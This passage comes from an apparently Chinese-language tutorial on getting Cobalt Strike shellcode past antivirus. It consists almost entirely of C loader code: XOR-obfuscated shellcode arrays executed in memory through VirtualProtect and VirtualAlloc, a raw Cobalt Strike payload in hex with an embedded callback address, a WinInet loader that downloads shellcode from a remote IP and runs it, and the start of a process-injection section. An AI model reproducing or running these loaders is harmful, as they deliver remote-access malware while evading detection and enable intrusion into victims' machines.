\xe6\x0a\x27\xb3\x11\x82\xf1\x16\xe1\xc5\x8a\xbc\x24\x3c\x77\x7c\x53\x4b\x2e\xab\x76\xcd\xbf\xee\xc2\x1d\x1c\xf4\x20\x8e\x88\x3d\xf4\xca\x68\xb9\xd2\xf5\x2b\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x2e\x31\x33\x00\x6f\xaa\x51\xc3"; for (size_t i = 0; i < sizeof buf; i++) { buf[i] ^= 66; buf[i] ^= 50; printf("\\x%x", buf[i]); } DWORD temp; VirtualProtect(buf, sizeof buf, PAGE_EXECUTE, &temp); ((void(*)())buf)(); }
在加载器加载
#include <Windows.h> #include <stdio.h> void main() { unsigned char buf[] = "\x8c\x38\xf3\x94\x80\x98\xb8\x70\x70\x70\x31\x21\x31\x20\x22\x21\x26\x38\x41\xa2\x15\x38\xfb\x22\x10\x38\xfb\x22\x68\x38\xfb\x22\x50\x38\xfb\x2\x20\x38\x7f\xc7\x3a\x3a\x3d\x41\xb9\x38\x41\xb0\xdc\x4c\x11\xc\x72\x5c\x50\x31\xb1\xb9\x7d\x31\x71\xb1\x92\x9d\x22\x31\x21\x38\xfb\x22\x50\xfb\x32\x4c\x38\x71\xa0\x16\xf1\x8\x68\x7b\x72\x5\x2\xfb\xf0\xf8\x70\x70\x70\x38\xf5\xb0\x4\x17\x38\x71\xa0\x20\xfb\x38\x68\x34\xfb\x30\x50\x39\x71\xa0\x93\x26\x38\x8f\xb9\x31\xfb\x44\xf8\x38\x71\xa6\x3d\x41\xb9\x38\x41\xb0\xdc\x31\xb1\xb9\x7d\x31\x71\xb1\x48\x90\x5\x81\x3c\x73\x3c\x54\x78\x35\x49\xa1\x5\xa8\x28\x34\xfb\x30\x54\x39\x71\xa0\x16\x31\xfb\x7c\x38\x34\xfb\x30\x6c\x39\x71\xa0\x31\xfb\x74\xf8\x38\x71\xa0\x31\x28\x31\x28\x2e\x29\x2a\x31\x28\x31\x29\x31\x2a\x38\xf3\x9c\x50\x31\x22\x8f\x90\x28\x31\x29\x2a\x38\xfb\x62\x99\x3f\x8f\x8f\x8f\x2d\x1a\x70\x39\xce\x7\x19\x1e\x19\x1e\x15\x4\x70\x31\x26\x39\xf9\x96\x3c\xf9\x81\x31\xca\x3c\x7\x56\x77\x8f\xa5\x38\x41\xb9\x38\x41\xa2\x3d\x41\xb0\x3d\x41\xb9\x31\x20\x31\x20\x31\xca\x4a\x26\x9\xd7\x8f\xa5\x9b\x3\x2a\x38\xf9\xb1\x31\xc8\x7a\x6a\x70\x70\x3d\x41\xb9\x31\x21\x31\x21\x1a\x73\x31\x21\x31\xca\x27\xf9\xef\xb6\x8f\xa5\x9b\x29\x2b\x38\xf9\xb1\x38\x41\xa2\x39\xf9\xa8\x3d\x41\xb9\x22\x18\x70\x72\x30\xf4\x22\x22\x31\xca\x9b\x25\x5e\x4b\x8f\xa5\x38\xf9\xb6\x38\xf3\xb3\x20\x1a\x7a\x2f\x38\xf9\x81\x38\xf9\xaa\x39\xb7\xb0\x8f\x8f\x8f\x8f\x3d\x41\xb9\x22\x22\x31\xca\x5d\x76\x68\xb\x8f\xa5\xf5\xb0\x7f\xf5\xed\x71\x70\x70\x38\x8f\xbf\x7f\xf4\xfc\x71\x70\x70\x9b\xa3\x99\x94\x71\x70\x70\x98\xd2\x8f\x8f\x8f\x5f\x13\x44\x24\x2\x70\xf5\xef\x18\x12\x16\x1a\xb\x59\xb9\x3\x29\x6d\x16\x8b\x85\x79\x62\xb1\x2f\x8b\x69\x81\x15\xc6\x5d\x97\x55\xce\xa8\x5\xaf\x25\xd5\x74\xd3\xfb\xb0\xd2\xa0\x18\x7a\xee\x72\x6a\xbd\x3c\xa5\xef\x28\xc2\xaf\xf2\x61\x65\x2\x83\xd2\x5b\xa5\xcd\xab\x73\x58\x5f\x5\x36\x35\xdc\x12\x9c\x82\x55\x7e\x70\x25\x3\x15\x2\x5d\x31\x17\x15\x1e\x4\x4a\x50\x3d\x1f\xa\x19\x1c\x1c\x11\x5f\x45\x5e\x40\x50\x58\x13\x1f\x1d\x0\x11\x4\x19\x12\x1c\x15\x4b\x50\x3d\x23\x39\x35\x50\x41\x40\x5e\x40\x4b\x50\x27\x19\x1e\x14\x1f\x7\x3\x50\x3e\x24\x50\x46\x5e\x41\x4b\x50\x27\x3f\x27\x46\x44\x4b\x50\x24\x2\x19\x14\x15\x1e\x4\x5f\x46\x5e\x40\x59\x7d\x7a\x70\xfc\x90\xae\xd9\xbe\xa0\x15\x15\xaa\x1f\xb7\x82\xe2\xce\x10\x0\xd9\x15\x33\x95\x72\x69\xf5\x1b\x3e\x10\x10\x7b\xe9\x2c\x11\x70\x40\x41\x7d\x6a\xbd\x85\x7f\xaf\xa6\x52\xf5\xb7\x81\xfc\x5f\xa6\x3d\xdc\xb6\x27\x1b\xa4\x50\xd6\x8d\x70\xce\x85\x56\x9\x99\xe4\xe\xcf\x61\xfc\xfe\xac\xaa\x56\x7b\x30\xc3\x37\x5e\x62\xd6\xe2\x3b\xe3\x5f\x97\x1\x0\xdf\x4d\x32\xf4\x3\xd1\x8e\xaa\x31\xa6\x5e\x1c\x72\xa2\x76\xfe\xee\x86\x1\xd0\xd9\x41\xc4\x76\xcb\x35\x62\x98\x7a\x4f\x58\xec\xcb\x90\x51\x40\x88\x3a\x1\xc4\xc1\xcf\x16\x50\x6e\xd0\x18\x47\x7e\x78\x79\x7f\xdb\xc8\x87\xb1\xaf\xf1\x2c\x5b\xc9\x61\xf5\xce\xb8\xcb\x5\xce\xdc\x2c\xcc\x5d\x19\x4d\x55\x19\x31\x40\x1c\x7a\xc4\xa7\x19\xe5\x39\x92\x21\xa3\x40\x9f\x7\x5d\x96\x7a\x57\xc3\x61\xf2\x81\x66\x91\xb5\xfa\xcc\x54\x4c\x7\xc\x23\x3b\x5e\xdb\x6\xbd\xcf\x9e\xb2\x6d\x6c\x84\x50\xfe\xf8\x4d\x84\xba\x18\xc9\xa2\x85\x5b\x70\x31\xce\x80\xc5\xd2\x26\x8f\xa5\x38\x41\xb9\xca\x70\x70\x30\x70\x31\xc8\x70\x60\x70\x70\x31\xc9\x30\x70\x70\x70\x31\xca\x28\xd4\x23\x95\x8f\xa5\x38\xe3\x23\x23\x38\xf9\x97\x38\xf9\x81\x38\xf9\xaa\x31\xc8\x70\x50\x70\x70\x39\xf9\x89\x31\xca\x62\xe6\xf9\x92\x8f\xa5\x38\xf3\xb4\x50\xf5\xb0\x4\xc6\x16\xfb\x77\x38\x71\xb3\xf5\xb0\x5\xa7\x28\x28\x28\x38\x75\x70\x70\x70\x70\x20\xb3\x98\xef\x8d\x8f\x8f\x41\x49\x42\x5e\x41\x46\x48\x5e\x41\x45\x5e\x41\x43\x70\x1f\xda\x21\xb3\x70"; unsigned char shellcode[892]; int len = sizeof(shellcode) - 1; for (size_t i = 0; i < len; i++) { buf[i] ^= 66; buf[i] ^= 50; shellcode[i] = buf[i]; } DWORD temp; VirtualProtect(shellcode, sizeof shellcode, PAGE_EXECUTE, &temp); ((void(*)())shellcode)(); }
或者只是用50异或,效果还可以
#include <Windows.h> #include <stdio.h> void main() { unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1"; for (size_t i = 0; i < sizeof buf - 1; i++) { buf[i] ^= 50; printf("\\x%x", buf[i]); } void* exe = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exe, buf, sizeof(buf)); ((void(*)())exe)(); //DWORD temp; //VirtualProtect(buf, sizeof buf, PAGE_EXECUTE, &temp); //((void(*)())buf)(); }
3.远程加载shellcode bypass
使用cobaltstrike进行shellcode的生成,放在远程服务器上
fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b80a1a00004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f6252347500ad3d2d2add6a4fc11e95de74892f1863bbfa37835201ef5dc8d39f12e4d055c3b7107ae88482e268045b46d8d7caf2c864e0fbdce5a53402bbce644e90c2a1d8d47c123b5a4f245ab400557365722d4167656e743a204d6f7a696c6c612f352e302028636f6d70617469626c653b204d5349452031302e303b2057696e646f7773204e5420362e323b2054726964656e742f362e30290d0a007e599a8d09cf08cce83ced48d5c4e3f13d046aee1ad13de8d1c6c160e261eb0a6e333569076dd2c88f7bb3cbe3421ded1e6e2fd6073bc57def331242e1a541882d07b6e1667f054ed28b659968dd1d3b53dd48c13c72adbf174c994c43ba1d25ab942f4e6380ca5e8bb7c8181fc83e53b91a2593e1af5468c1237acbabe67df9d239a65778e0cda7ce28a56508b8b5a57cd7e10bb0e05dd698096fd2f6b058ba7a4ebf3c70bd74a9f6f6364bd27838085cc34ccf2087c685926d33c6fc37976308b424e5b13e48ccf0ae7c4511c8dcf0c1d467595c51bd8e774fe7324001f2c10041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e31352e3133006faa51c3
加载器进行远程执行
#include <stdio.h> #include <Windows.h> #include <WinInet.h> #pragma comment(lib, "WinInet.lib") char* GetUrlPage(const char* URL, const char* SubPath) { HINTERNET hInternet, hConnect, hRequest = NULL; DWORD dwOpenRequestFlags, dwRet = 0; unsigned char* pResponseHeaderIInfo = NULL; DWORD dwResponseHeaderIInfoSize = 2048; BYTE* pBuf = NULL; DWORD dwBufSize = 64 * 2048; hInternet = InternetOpenA("WinInetGet/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); hConnect = InternetConnectA(hInternet, URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0); if (NULL == hConnect) return NULL; dwOpenRequestFlags = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD; hRequest = HttpOpenRequestA(hConnect, "GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0); HttpSendRequest(hRequest, NULL, 0, NULL, 0); pResponseHeaderIInfo = new unsigned char[dwResponseHeaderIInfoSize]; RtlZeroMemory(pResponseHeaderIInfo, dwResponseHeaderIInfoSize); HttpQueryInfo(hRequest, HTTP_QUERY_RAW_HEADERS_CRLF, pResponseHeaderIInfo, &dwResponseHeaderIInfoSize, NULL); pBuf = new BYTE[dwBufSize]; RtlZeroMemory(pBuf, dwBufSize); InternetReadFile(hRequest, pBuf, dwBufSize, &dwRet); return (char*)pBuf; } void main() { char* shellcode = GetUrlPage("124.70.216.166", "/payload.c"); printf("%s \n", shellcode); int shellcode_length = strlen(shellcode); unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char)); for (size_t count = 0; count < shellcode_length / 2; count++) { sscanf_s(shellcode, "%2hhx", &value[count]); shellcode += 2; } void* exec = VirtualAlloc(0, shellcode_length / 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, value, shellcode_length / 2); ((void(*)())exec)(); }
4.进程注入
先异或一个50
#include <Windows.h> #include <stdio.h> void main() { unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1"; for (size_t i = 0; i < sizeof buf; i++) { buf[i] ^= 50; printf("\\x%x", buf[i]); } DWORD temp; VirtualProtect(buf, sizeof buf, PAGE_EXECUTE, &temp); ((void(*)())buf)(); }
#include <stdio.h> #include <windows.h> #include <TlHelp32.h> unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x3